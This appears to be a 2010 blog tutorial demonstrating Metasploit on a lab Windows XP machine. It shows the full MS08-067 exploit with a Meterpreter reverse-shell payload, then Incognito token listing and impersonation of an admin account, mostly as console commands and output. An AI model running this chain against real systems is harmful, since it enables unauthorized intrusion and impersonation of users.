Using Metasploit’s Incognito To Impersonate User Tokens
January 30, 2010 – 10:48 AMI just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system. You can think of tokens as a web “cookie” which is just an object that holds your security information for the entire login process so that you don’t have to re-authenticate yourself on the system or network each time you want to access another object. You can read more about tokens here: http://en.wikipedia.org/wiki/Token_(Windows_NT_architecture)
On this particular machine, “Troy” is an Admin account.
(without all the screenshots – sorry dial-up users)
We’ll start off by launching Metasploit and exploiting the system. For this we need to make sure the payload returns a meterpreter session back to us:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
– —-
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1089)
meterpreter >
Once we have a meterpreter session we can launch the Incognito module, list the available tokens and impersonate the one you want:
Server username: NT AUTHORITY\SYSTEM
meterpreter > use Incognito
Loading extension incognito…success.
meterpreter > list_tokens -u
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
VM-WINXP\Troy
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
[+] Delegation token available
[+] Successfully impersonated user VM-WINXP\Troy
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > execute -f cmd.exe -i -t
Process 416 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
VM-WINXP\Troy
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Complete success without having to crack passwords or “pass the hash”.
